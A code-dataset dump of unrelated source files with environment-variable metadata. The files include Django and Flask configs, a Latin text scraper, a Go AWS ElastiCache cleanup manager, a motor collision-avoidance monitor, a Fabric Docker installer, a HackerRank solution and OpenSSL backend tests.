# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '9=01-nw4hr6$%n6f!axxwaxds_m)m#fjxigsatgcondr$we==$'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'core',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'app.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'app.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
## 'ENGINE': 'django.db.backends.sqlite3',
## 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
'ENGINE': 'django.db.backends.postgresql',
'HOST': os.environ.get('DB_HOST'),
'NAME': os.environ.get('DB_NAME'),
'USER': os.environ.get('DB_USER'),
'PASSWORD': os.environ.get('DB_PASS'),
}
}
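# Illustrative: the environment this block expects (placeholder values):
#
#   DB_HOST=db DB_NAME=app DB_USER=postgres DB_PASS=changeme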
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
AUTH_USER_MODEL = 'core.User'
| [] | [] | [
"DB_PASS",
"DB_USER",
"DB_NAME",
"DB_HOST"
] | [] | ["DB_PASS", "DB_USER", "DB_NAME", "DB_HOST"] | python | 4 | 0 | |
backend/manage.py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'cryptogramx_33764.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [] | [] | [] | [] | [] | python | 0 | 0 | |
phyllo/extractors/theodosiusDB.py | import sqlite3
import urllib
import re
from urllib.request import urlopen
from bs4 import BeautifulSoup
from phyllo.phyllo_logger import logger
# seems to work fine
# should probably check on chapter divisions
def getBooks(soup):
siteURL = 'http://www.thelatinlibrary.com'
textsURL = []
# get links to books in the collection
for a in soup.find_all('a', href=True):
link = a['href']
textsURL.append("{}/{}".format(siteURL, a['href']))
# remove unnecessary URLs
while ("http://www.thelatinlibrary.com/index.html" in textsURL):
textsURL.remove("http://www.thelatinlibrary.com/index.html")
textsURL.remove("http://www.thelatinlibrary.com/classics.html")
try:
textsURL.remove("http://thelatinlibrary.com/ius.html")
except:
pass
logger.info("\n".join(textsURL))
return textsURL
def main():
# The collection URL below.
collURL = 'http://thelatinlibrary.com/theodosius.html'
collOpen = urllib.request.urlopen(collURL)
collSOUP = BeautifulSoup(collOpen, 'html5lib')
author = "Theodosius"
colltitle = collSOUP.title.string.strip()
date = "no date found"
textsURL = getBooks(collSOUP)
with sqlite3.connect('texts.db') as db:
c = db.cursor()
c.execute(
'CREATE TABLE IF NOT EXISTS texts (id INTEGER PRIMARY KEY, title TEXT, book TEXT,'
' language TEXT, author TEXT, date TEXT, chapter TEXT, verse TEXT, passage TEXT,'
' link TEXT, documentType TEXT)')
c.execute("DELETE FROM texts WHERE author = 'Theodosius'")
for url in textsURL:
openurl = urllib.request.urlopen(url)
textsoup = BeautifulSoup(openurl, 'html5lib')
title = textsoup.title.string.strip()
print(title)
chapter = -1
verse = 0
getp = textsoup.find_all('p')
for p in getp:
try:
if p['class'][0].lower() in ['border', 'pagehead', 'shortborder', 'smallborder', 'margin',
'internal_navigation']: # these are not part of the main text
continue
except:
pass
if p.find('br') is not None:
# these are chapter/verse lists
# probably redundant
continue
verses = []
pstring = p.get_text()
pstring = pstring.strip()
if pstring.startswith("CTh"):
# this is either a chapter or verse heading
                    if '0' in re.split(r'\.', pstring):
# this is a chapter heading
chapter = pstring
continue
else:
verse = pstring
continue
verses.append(pstring)
for v in verses:
if v.startswith('Theodosian Code'):
continue
if v.startswith('The Latin Library'):
continue
if v is None or v == '' or v.isspace():
continue
c.execute("INSERT INTO texts VALUES (?,?,?,?,?,?,?, ?, ?, ?, ?)",
(None, colltitle, title, 'Latin', author, date, chapter,
verse, v.strip(), url, 'prose'))
if __name__ == '__main__':
main()
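# Illustrative follow-up (not part of the original script): read back a few
# rows to sanity-check the scrape.
#
#   with sqlite3.connect('texts.db') as db:
#       for row in db.execute("SELECT chapter, verse, passage FROM texts "
#                             "WHERE author = 'Theodosius' LIMIT 3"):
#           print(row)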
| [] | [] | [] | [] | [] | python | null | null | null |
config.py | import os
basedir = os.path.abspath(os.path.dirname(__file__))
class Config:
SECRET_KEY = os.environ.get('SECRET_KEY') or 'secretkey'
MAIL_SERVER = os.environ.get('MAIL_SERVER', 'smtp.googlemail.com')
MAIL_PORT = int(os.environ.get('MAIL_PORT', '587'))
MAIL_USE_TLS = os.environ.get('MAIL_USE_TLS', 'true').lower() in \
['true', 'on', '1']
MAIL_USERNAME = os.environ.get('MAIL_USERNAME')
MAIL_PASSWORD = os.environ.get('MAIL_PASSWORD')
FLASKY_MAIL_SUBJECT_PREFIX = '[Flasky]'
FLASKY_MAIL_SENDER = 'Flasky Admin <[email protected]>'
FLASKY_ADMIN = os.environ.get('FLASKY_ADMIN')
FLASKY_POSTS_PER_PAGE = os.environ.get('FLASKY_POSTS_PER_PAGE') or 25
FLASKY_FOLLOWERS_PER_PAGE = os.environ.get('FLASKY_FOLLOWERS_PER_PAGE') or 15
FLASKY_COMMENTS_PER_PAGE = os.environ.get('FLASKY_COMMENTS_PER_PAGE') or 30
SQLALCHEMY_TRACK_MODIFICATIONS = False
SQLALCHEMY_RECORD_QUERIES = True
FLASKY_SLOW_DB_QUERY_TIME = 0.5
@staticmethod
def init_app(app):
pass
class DevelopmentConfig(Config):
DEBUG = True
SQLALCHEMY_DATABASE_URI = os.environ.get('DEV_DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir, 'data-dev.sqlite')
class TestingConfig(Config):
TESTING = True
SQLALCHEMY_DATABASE_URI = os.environ.get('TEST_DATABASE_URL') or \
'sqlite://'
class ProductionConfig(Config):
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir, 'data.sqlite')
config = {
'development': DevelopmentConfig,
'testing': TestingConfig,
'production': ProductionConfig,
'default': DevelopmentConfig
}
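# Illustrative usage in a hypothetical app factory, selecting a config by
# name (FLASK_CONFIG is an assumed variable, not defined in this file):
#
#   from flask import Flask
#   app = Flask(__name__)
#   app.config.from_object(config[os.environ.get('FLASK_CONFIG', 'default')])
#   config[os.environ.get('FLASK_CONFIG', 'default')].init_app(app)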
| [] | [] | [
"FLASKY_FOLLOWERS_PER_PAGE",
"FLASKY_POSTS_PER_PAGE",
"MAIL_SERVER",
"MAIL_PASSWORD",
"DEV_DATABASE_URL",
"DATABASE_URL",
"FLASKY_ADMIN",
"MAIL_PORT",
"SECRET_KEY",
"MAIL_USERNAME",
"MAIL_USE_TLS",
"TEST_DATABASE_URL",
"FLASKY_COMMENTS_PER_PAGE"
] | [] | ["FLASKY_FOLLOWERS_PER_PAGE", "FLASKY_POSTS_PER_PAGE", "MAIL_SERVER", "MAIL_PASSWORD", "DEV_DATABASE_URL", "DATABASE_URL", "FLASKY_ADMIN", "MAIL_PORT", "SECRET_KEY", "MAIL_USERNAME", "MAIL_USE_TLS", "TEST_DATABASE_URL", "FLASKY_COMMENTS_PER_PAGE"] | python | 13 | 0 | |
pkg/aws/manager_elasticache.go | package aws
import (
"strings"
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/aws/session"
"github.com/aws/aws-sdk-go/service/elasticache"
"github.com/aws/aws-sdk-go/service/elasticache/elasticacheiface"
"github.com/aws/aws-sdk-go/service/resourcegroupstaggingapi"
"github.com/aws/aws-sdk-go/service/resourcegroupstaggingapi/resourcegroupstaggingapiiface"
"github.com/integr8ly/cluster-service/pkg/clusterservice"
"github.com/integr8ly/cluster-service/pkg/errors"
"github.com/sirupsen/logrus"
)
var _ ClusterResourceManager = &ElasticacheManager{}
type ElasticacheManager struct {
elasticacheClient elasticacheiface.ElastiCacheAPI
taggingClient resourcegroupstaggingapiiface.ResourceGroupsTaggingAPIAPI
logger *logrus.Entry
}
func NewDefaultElasticacheManager(session *session.Session, logger *logrus.Entry) *ElasticacheManager {
return &ElasticacheManager{
elasticacheClient: elasticache.New(session),
taggingClient: resourcegroupstaggingapi.New(session),
logger: logger.WithField(loggingKeyManager, managerElasticache),
}
}
func (r *ElasticacheManager) GetName() string {
return "AWS ElastiCache Manager"
}
// DeleteResourcesForCluster deletes all ElastiCache resources for a specified cluster
func (r *ElasticacheManager) DeleteResourcesForCluster(clusterId string, tags map[string]string, dryRun bool) ([]*clusterservice.ReportItem, error) {
logger := r.logger.WithFields(logrus.Fields{"clusterId": clusterId, "dryRun": dryRun})
logger.Debug("deleting resources for cluster")
var reportItems []*clusterservice.ReportItem
var replicationGroupsToDelete []string
resourceInput := &resourcegroupstaggingapi.GetResourcesInput{
ResourceTypeFilters: aws.StringSlice([]string{"elasticache:cluster"}),
TagFilters: convertClusterTagsToAWSTagFilter(clusterId, tags),
}
resourceOutput, err := r.taggingClient.GetResources(resourceInput)
if err != nil {
return nil, errors.WrapLog(err, "failed to describe cache clusters", logger)
}
for _, resourceTagMapping := range resourceOutput.ResourceTagMappingList {
arn := aws.StringValue(resourceTagMapping.ResourceARN)
arnSplit := strings.Split(arn, ":")
cacheClusterId := arnSplit[len(arnSplit)-1]
cacheClusterInput := &elasticache.DescribeCacheClustersInput{
CacheClusterId: aws.String(cacheClusterId),
}
cacheClusterOutput, err := r.elasticacheClient.DescribeCacheClusters(cacheClusterInput)
if err != nil {
return nil, errors.WrapLog(err, "cannot get cacheCluster output", logger)
}
for _, cacheCluster := range cacheClusterOutput.CacheClusters {
rgLogger := logger.WithField("replicationGroup", cacheCluster.ReplicationGroupId)
if contains(replicationGroupsToDelete, *cacheCluster.ReplicationGroupId) {
rgLogger.Debugf("replication Group already exists in deletion list (%s=%s)", *cacheCluster.ReplicationGroupId, clusterId)
break
}
replicationGroupsToDelete = append(replicationGroupsToDelete, *cacheCluster.ReplicationGroupId)
}
}
logger.Debugf("filtering complete, %d replicationGroups matched", len(replicationGroupsToDelete))
for _, replicationGroupId := range replicationGroupsToDelete {
//delete each replication group in the list
rgLogger := logger.WithField("replicationGroupId", aws.String(replicationGroupId))
rgLogger.Debugf("building report for database")
reportItem := &clusterservice.ReportItem{
ID: replicationGroupId,
Name: "elasticache Replication group",
Action: clusterservice.ActionDelete,
ActionStatus: clusterservice.ActionStatusInProgress,
}
reportItems = append(reportItems, reportItem)
if dryRun {
rgLogger.Debug("dry run enabled, skipping deletion step")
reportItem.ActionStatus = clusterservice.ActionStatusDryRun
continue
}
rgLogger.Debug("performing deletion of replication group")
replicationGroupDescribeInput := &elasticache.DescribeReplicationGroupsInput{
ReplicationGroupId: &replicationGroupId,
}
replicationGroup, err := r.elasticacheClient.DescribeReplicationGroups(replicationGroupDescribeInput)
if err != nil {
return nil, errors.WrapLog(err, "cannot describe replicationGroups", logger)
}
//deleting will return an error if the replication group is already in a deleting state
if len(replicationGroup.ReplicationGroups) > 0 &&
aws.StringValue(replicationGroup.ReplicationGroups[0].Status) == statusDeleting {
rgLogger.Debugf("deletion of replication Groups already in progress")
reportItem.ActionStatus = clusterservice.ActionStatusInProgress
continue
}
deleteReplicationGroupInput := &elasticache.DeleteReplicationGroupInput{
ReplicationGroupId: aws.String(replicationGroupId),
RetainPrimaryCluster: aws.Bool(false),
}
if _, err := r.elasticacheClient.DeleteReplicationGroup(deleteReplicationGroupInput); err != nil {
return nil, errors.WrapLog(err, "failed to delete elasticache replication group", logger)
}
}
	return reportItems, nil
}
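// contains reports whether targetValue is a non-empty element of arr.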
func contains(arr []string, targetValue string) bool {
for _, element := range arr {
if element != "" && element == targetValue {
return true
}
}
return false
}
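// Illustrative dry-run sketch (not in the original file); the cluster ID is
// a placeholder:
//
//	sess := session.Must(session.NewSession())
//	mgr := NewDefaultElasticacheManager(sess, logrus.NewEntry(logrus.New()))
//	items, err := mgr.DeleteResourcesForCluster("cluster-abc123", nil, true)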
| [] | [] | [] | [] | [] | go | null | null | null |
Models_II_Relaciones/Models_II_Relaciones/asgi.py | """
ASGI config for Models_II_Relaciones project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Models_II_Relaciones.settings')
application = get_asgi_application()
| [] | [] | [] | [] | [] | python | 0 | 0 | |
CollisionAvoidanceMonitor/main.py | import sys
import os
import ode
import logging
import threading
from time import sleep, time
from genie_python.genie_startup import *
import pv_server
import render
from configurations import config_zoom as config
from collide import collide, CollisionDetector
from geometry import GeometryBox
from move import move_all
sys.path.insert(0, os.path.abspath(os.environ["MYDIRCD"]))
from monitor import Monitor
from server_common.loggers.isis_logger import IsisLogger
logging.basicConfig(level=logging.INFO,
format='%(asctime)s (%(threadName)-2s) %(message)s',
)
def auto_seek(start_step_size, start_values, end_value, geometries, moves, axis_index, ignore, fine_step=None):
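    """
    Step axis `axis_index` from its current value towards `end_value` in
    increments of `start_step_size`, moving all geometries at each step.
    The step is shrunk if any body moves further than `start_step_size`
    in a single step. Returns the last collision-free value reached
    (optionally re-sought with `fine_step` once a collision is found),
    or `end_value` if no collision occurs.
    """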
limit = end_value
current_value = start_values[axis_index]
if current_value == end_value:
return end_value
values = start_values[:]
last_value = None
old_points = None
step_checked = False
if current_value < end_value:
# Going up
def comp(a, b):
return a < b
step_size = abs(start_step_size)
else:
# Going down
def comp(a, b):
return a > b
step_size = -abs(start_step_size)
while last_value is None or comp(last_value, end_value):
# Move if we need to
if last_value is not None:
current_value += step_size
# print "Using step size of %f" % step_size
else:
current_value = start_values[axis_index]
if not comp(current_value, end_value):
current_value = end_value
values[axis_index] = current_value
move_all(geometries, moves, values=values[:])
# Check nothing moved too far
if step_checked is False:
new_points = [g.get_vertices() for g in geometries]
if old_points is not None:
delta = max_delta(geometries, new_points, old_points)
if delta > start_step_size:
# Work out a new step size
step_size *= start_step_size/delta
last_value = None
continue
step_checked = True
# Check for collisions
collisions = collide(geometries, ignore)
if any(collisions):
if current_value == start_values[axis_index]:
# There was already a collision
limit = current_value
break
elif fine_step and fine_step < step_size:
start_values[axis_index] = last_value
limit = auto_seek(fine_step, start_values, current_value, geometries, moves, axis_index, ignore)
else:
limit = last_value
break
old_points = new_points[:]
last_value = current_value
# print "Found limits for axis %d using step size of %f" % (axis_index, step_size)
if limit is None:
raise ValueError("Null limit")
return limit
def max_delta(geometries, new_points, old_points):
# Calculate the greatest position deltas
delta = 0
for j in range(len(geometries)):
old = old_points[j]
new = new_points[j]
deltas = [map(float, n - o) for n, o in zip(new, old)]
for i, (x, y, z) in enumerate(deltas):
mag = float(x) ** 2 + float(y) ** 2 + float(z) ** 2
if mag > delta:
delta = mag
# print "New max delta of %f (%f, %f, %f) for body %d at %s from %s" % \
# (mag ** 0.5, x, y, z, j, new[i], old[i])
delta = float(delta) ** 0.5
return delta
def compare(sign):
if sign > 0:
return lambda a, b: a > b
else:
return lambda a, b: a < b
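# Illustrative: compare(+1) asks "has a passed b going upwards", compare(-1)
# the same going downwards.
#
#   compare(1)(5.0, 4.0)   # True
#   compare(-1)(5.0, 4.0)  # False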
def auto_seek_limits(geometries, ignore, moves, values, limits, coarse=1.0, fine=0.1):
dynamic_limits = []
for i in range(len(values)):
logging.debug("Seeking for axis %d" % i)
lower_limit = auto_seek(coarse, values[:], min(limits[i]), geometries, moves, i, ignore, fine)
upper_limit = auto_seek(coarse, values[:], max(limits[i]), geometries, moves, i, ignore, fine)
dynamic_limits.append([lower_limit, upper_limit])
logging.debug("Found limits for axis %d at %s, %s" % (i, upper_limit, lower_limit))
return dynamic_limits
def look_ahead(start_values, pvs, is_moving, geometries, moves, ignore, max_movement=1.0, max_time=10., time_step=0.1):
# Get the indices of the axes currently moving
moving = [i for i, m in enumerate(is_moving) if m == 0] # DMOV = 0 when motors not moving
msg = "No collisions predicted in the next %fs" % max_time
safe_time = max_time
safe = True
# Only worth calculating if more than one axis is moving
if len(moving) > 1:
set_points = [None] * len(pvs)
speeds = [None] * len(pvs)
directions = [None] * len(pvs)
# Assume everything has finished moving
move_complete = [True] * len(pvs)
# Get some settings:
for i in moving:
pv = pvs[i]
set_point = get_pv(pv + '.DVAL')
speed = get_pv(pv + '.VELO')
direction = 0.
move = set_point - start_values[i]
if move > 0:
direction = 1.
if move < 0:
direction = -1.
set_points[i] = set_point
speeds[i] = speed
directions[i] = direction
# This axis has not finished moving!
move_complete[i] = False
current_time = 0.
values = start_values[:]
old_points = None
step_checked = False
last_time = None
while current_time < max_time:
if last_time is None:
values = start_values[:]
current_time = 0.
old_points = None
else:
current_time += time_step
for i in moving:
if move_complete[i] is False:
values[i] = start_values[i] + (directions[i] * speeds[i] * current_time)
comp = compare(directions[i])(values[i], set_points[i])
if comp:
values[i] = set_points[i]
# Move the bodies
move_all(geometries, moves, values=values)
if step_checked is False:
new_points = [g.get_vertices() for g in geometries]
if old_points is not None:
delta = max_delta(geometries, new_points, old_points)
if delta > max_movement:
# Reduce the size of the time step
time_step *= max_movement/delta
# Reset to starting point
last_time = None
old_points = None
continue
step_checked = True
# Check for collisions
collisions = collide(geometries, ignore)
if any(collisions):
if last_time is None:
msg = "There is already a collision"
safe_time = 0.
else:
msg = "Collision expected in %.1fs - %.1fs" % (last_time, current_time)
safe_time = last_time
safe = False
break
old_points = new_points[:]
last_time = current_time
return msg, safe_time, safe
# Set the high and low dial limits for each motor
def set_limits(limits, pvs):
for limit, pv in zip(limits, pvs):
set_pv(pv + '.DLLM', limit[0])
set_pv(pv + '.DHLM', limit[1])
# Contains operating mode events
class OperatingMode(object):
def __init__(self):
# Close event to be triggered by the render thread
self.close = threading.Event()
# Set dynamic limits automatically
self.set_limits = threading.Event()
# Stop the motors on a collision
self.auto_stop = threading.Event()
# Re-calculate limits on demand
self.calc_limits = threading.Event()
def get_operation_mode(self):
return self.auto_stop.is_set(), self.set_limits.is_set(), self.close.is_set()
def set_operation_mode(self, auto_stop, set_limits, close):
if auto_stop:
self.auto_stop.set()
else:
self.auto_stop.clear()
if set_limits:
self.set_limits.set()
else:
self.set_limits.clear()
if close:
self.close.set()
else:
self.close.clear()
# The main routine to execute
def main():
# Load config:
colors = config.colors
moves = config.moves
ignore = config.ignore
pvs = config.pvs
config_limits = config.hardlimits
old_limits = config_limits[:]
# Create space objects for the live and rendered world
space = ode.Space()
render_space = ode.Space()
collision_space = ode.Space()
# Create and populate lists of geometries
geometries = []
render_geometries = []
collision_geometries = []
for i, geometry in enumerate(config.geometries):
geometries.append(GeometryBox(space, oversize=config.oversize, **geometry))
render_geometries.append(GeometryBox(render_space, **geometry))
collision_geometries.append(GeometryBox(collision_space, oversize=config.oversize, **geometry))
# Create and populate two lists of monitors
monitors = []
is_moving = []
for pv in pvs:
m = Monitor(pv + ".DRBV")
m.start()
monitors.append(m)
any_moving = Monitor(pv + ".DMOV")
any_moving.start()
is_moving.append(any_moving)
# Create a shared operating mode object to control the main thread
op_mode = OperatingMode()
# Set the default behaviour to set_limits as calculated, and auto_stop on collision
op_mode.set_limits.set()
op_mode.auto_stop.set()
# Start a logger
logger = IsisLogger()
# Create a shared render parameter object to update the render thread
parameters = render.RenderParams()
if 'blind' not in sys.argv:
# Initialise the render thread, and set it to daemon - won't prevent the main thread from exiting
renderer = render.Renderer(parameters, render_geometries, colors, monitors, pvs, moves, op_mode)
renderer.daemon = True
# Need to know if this is the first execution of the main loop
op_mode.calc_limits.set()
# Initialise the pv server
# Loop over the pvdb and update the counts based on the number of aves/bodies
for pv in pv_server.pvdb:
for key, val in pv_server.pvdb[pv].items():
if key == 'count':
if val is pv_server.axis_count:
pv_server.pvdb[pv]['count'] = len(config.pvs)
if val is pv_server.body_count:
pv_server.pvdb[pv]['count'] = len(config.geometries)
driver = pv_server.start_thread(config.control_pv, op_mode)
driver.setParam('OVERSIZE', config.oversize)
driver.setParam('COARSE', config.coarse)
driver.setParam('FINE', config.fine)
driver.setParam('NAMES', [g['name'] for g in config.geometries])
# Only report for new collisions
collision_detector = CollisionDetector(driver, collision_geometries, config.moves, monitors, config.ignore,
is_moving, logger, op_mode, config.pvs)
collision_detector.start()
# Main loop
while True:
# Freeze the positions of our current monitors by creating some dummies
        # This stops the threads from trying to read each monitor sequentially, and holding each other up
frozen = [m.value() for m in monitors]
# Execute the move
move_all(geometries, moves, values=frozen)
# Check if the oversize has been changed, ahead of any collision calcs
if driver.new_data.isSet():
for geometry, collision_geometry in zip(geometries, collision_geometries):
geometry.set_size(oversize=driver.getParam('OVERSIZE'))
collision_geometry.set_size(oversize=driver.getParam('OVERSIZE'))
driver.new_data.clear()
op_mode.calc_limits.set()
if driver.getParam("CALC") != 0:
op_mode.calc_limits.set()
collisions = collision_detector.collisions[:]
collision_message = collision_detector.message[:]
        # Check if there have been any changes to the .DMOV monitors
fresh = any([m.fresh() for m in is_moving])
# Check if any of the motors monitors are moving
moving = [not m.value() for m in is_moving] # Invert because DMOV is inverted from MOVN
any_moving = any(moving)
new_limits = []
if fresh or any_moving or op_mode.calc_limits.isSet():
# Look ahead some time to see if any collisions are going to happen in the future
msg, safe_time, safe = look_ahead(frozen, config.pvs, moving, geometries, moves, ignore,
max_movement=driver.getParam('COARSE'))
if not safe and not any(collisions):
logger.write_to_log(msg, "MAJOR", "COLLIDE")
driver.setParam('MSG', msg)
else:
driver.setParam('MSG', collision_message)
logging.info(msg)
# Start timing for diagnostics
time_passed = time()
# Seek the correct limit values
dynamic_limits = auto_seek_limits(geometries, ignore, moves, frozen, config_limits,
coarse=driver.getParam('COARSE'), fine=driver.getParam('FINE'))
# Calculate and log the time taken to calculate
time_passed = (time() - time_passed) * 1000
# Log the new limits
logging.info("New limits calculated in %dms, are %s" % (time_passed, dynamic_limits))
# Set the limits according to the set_limits operating mode
if op_mode.set_limits.is_set():
# Apply the calculated limits
new_limits = dynamic_limits[:]
else:
# Restore the configuration limits
new_limits = config_limits[:]
# Update the render thread parameters
parameters.update_params(dynamic_limits, collisions, time_passed)
# # Update the PVs
driver.setParam('TIME', time_passed)
driver.setParam('HI_LIM', [l[1] for l in dynamic_limits])
driver.setParam('LO_LIM', [l[0] for l in dynamic_limits])
driver.setParam('TRAVEL', [min([l[0] - m, l[1] - m], key=abs)
for l, m in zip(dynamic_limits, frozen)])
driver.setParam('TRAV_F', [l[1] - m for l, m in zip(dynamic_limits, frozen)])
driver.setParam('TRAV_R', [l[0] - m for l, m in zip(dynamic_limits, frozen)])
driver.updatePVs()
if 'blind' not in sys.argv:
# On the first run, start the renderer
if renderer.is_alive() is False:
renderer.start()
op_mode.calc_limits.clear()
driver.setParam("CALC", False)
else:
# Restore the configuration limits
if op_mode.set_limits.is_set() is False:
new_limits = config_limits[:]
# Stop us overloading the limits
if not new_limits == old_limits:
threading.Thread(target=set_limits, args=(new_limits, pvs)).start()
old_limits = new_limits[:]
# Exit the program
if op_mode.close.is_set():
# Restore the configuration limits
set_limits(config_limits, pvs)
return
# Give the CPU a break
sleep(0.01)
if 'return' in sys.argv:
return
# Execute main
main()
| [] | [] | [
"MYDIRCD"
] | [] | ["MYDIRCD"] | python | 1 | 0 | |
rancher1.6/installer.py | from fabric import Connection
import os
def connectSSH():
return Connection(host=os.getenv('FAB_HOST'), user=os.getenv('FAB_USER'))
def updatePackages(conn):
updateResult = conn.run('sudo apt-get update')
def installHelperPackages(conn):
helperPackagesResult = conn.run('sudo apt-get install -y apt-transport-https ca-certificates curl software-properties-common')
def addDockerRepo(conn):
keyResult = conn.run('curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -')
addRepoResult = conn.run('sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"')
def installDocker(conn):
installResult = conn.run('sudo apt-get update && sudo apt-get install -y docker-ce')
gpasswdResult = conn.run('sudo gpasswd -a $USER docker')
serviceResult = conn.run('sudo systemctl restart docker.service')
if __name__ == '__main__':
conn = connectSSH()
updatePackages(conn)
installHelperPackages(conn)
addDockerRepo(conn)
installDocker(conn) | [] | [] | [
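# Illustrative: the environment this script expects (placeholder values):
#
#   export FAB_HOST=203.0.113.10
#   export FAB_USER=ubuntu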
"FAB_USER",
"FAB_HOST"
] | [] | ["FAB_USER", "FAB_HOST"] | python | 2 | 0 | |
HackerRank/Algorithm/Strings/TwoStrings.java | import java.io.*;
import java.math.*;
import java.security.*;
import java.text.*;
import java.util.*;
import java.util.concurrent.*;
import java.util.regex.*;
public class Solution {
// Complete the twoStrings function below.
static String twoStrings(String s1, String s2) {
HashSet<Character> hs = new HashSet<Character>();
for(int i=0;i<s1.length();i++){
hs.add(s1.charAt(i));
}
int count = 0;
for(int i=0;i<s2.length();i++){
if(hs.contains(s2.charAt(i))) {
count++;
break;
}
}
if(count==1) return "YES";
return "NO";
}
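    // Illustrative behaviour (not part of the original solution):
    //   twoStrings("hello", "world") -> "YES" (shares 'l' and 'o')
    //   twoStrings("hi", "zap")      -> "NO"  (no common character)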
private static final Scanner scanner = new Scanner(System.in);
public static void main(String[] args) throws IOException {
BufferedWriter bufferedWriter = new BufferedWriter(new FileWriter(System.getenv("OUTPUT_PATH")));
int q = scanner.nextInt();
scanner.skip("(\r\n|[\n\r\u2028\u2029\u0085])?");
for (int qItr = 0; qItr < q; qItr++) {
String s1 = scanner.nextLine();
String s2 = scanner.nextLine();
String result = twoStrings(s1, s2);
bufferedWriter.write(result);
bufferedWriter.newLine();
}
bufferedWriter.close();
scanner.close();
}
}
| [
"\"OUTPUT_PATH\""
] | [] | [
"OUTPUT_PATH"
] | [] | ["OUTPUT_PATH"] | java | 1 | 0 | |
tests/hazmat/backends/test_openssl.py | # This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
import itertools
import os
import subprocess
import sys
import textwrap
import pytest
from cryptography import x509
from cryptography.exceptions import InternalError, _Reasons
from cryptography.hazmat.backends.interfaces import DHBackend, RSABackend
from cryptography.hazmat.backends.openssl.backend import Backend, backend
from cryptography.hazmat.backends.openssl.ec import _sn_to_elliptic_curve
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import dh, dsa, padding
from cryptography.hazmat.primitives.ciphers import Cipher
from cryptography.hazmat.primitives.ciphers.algorithms import AES
from cryptography.hazmat.primitives.ciphers.modes import CBC
from ..primitives.fixtures_rsa import RSA_KEY_2048, RSA_KEY_512
from ...doubles import (
DummyAsymmetricPadding,
DummyCipherAlgorithm,
DummyHashAlgorithm,
DummyMode,
)
from ...utils import (
load_nist_vectors,
load_vectors_from_file,
raises_unsupported_algorithm,
)
from ...x509.test_x509 import _load_cert
def skip_if_libre_ssl(openssl_version):
if "LibreSSL" in openssl_version:
pytest.skip("LibreSSL hard-codes RAND_bytes to use arc4random.")
class TestLibreSkip(object):
def test_skip_no(self):
assert skip_if_libre_ssl("OpenSSL 1.0.2h 3 May 2016") is None
def test_skip_yes(self):
with pytest.raises(pytest.skip.Exception):
skip_if_libre_ssl("LibreSSL 2.1.6")
class DummyMGF(object):
_salt_length = 0
class TestOpenSSL(object):
def test_backend_exists(self):
assert backend
def test_openssl_version_text(self):
"""
This test checks the value of OPENSSL_VERSION_TEXT.
Unfortunately, this define does not appear to have a
formal content definition, so for now we'll test to see
if it starts with OpenSSL or LibreSSL as that appears
to be true for every OpenSSL-alike.
"""
assert backend.openssl_version_text().startswith(
"OpenSSL"
) or backend.openssl_version_text().startswith("LibreSSL")
def test_openssl_version_number(self):
assert backend.openssl_version_number() > 0
def test_supports_cipher(self):
assert backend.cipher_supported(None, None) is False
def test_register_duplicate_cipher_adapter(self):
with pytest.raises(ValueError):
backend.register_cipher_adapter(AES, CBC, None)
@pytest.mark.parametrize("mode", [DummyMode(), None])
def test_nonexistent_cipher(self, mode):
b = Backend()
b.register_cipher_adapter(
DummyCipherAlgorithm,
type(mode),
lambda backend, cipher, mode: backend._ffi.NULL,
)
cipher = Cipher(
DummyCipherAlgorithm(),
mode,
backend=b,
)
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_CIPHER):
cipher.encryptor()
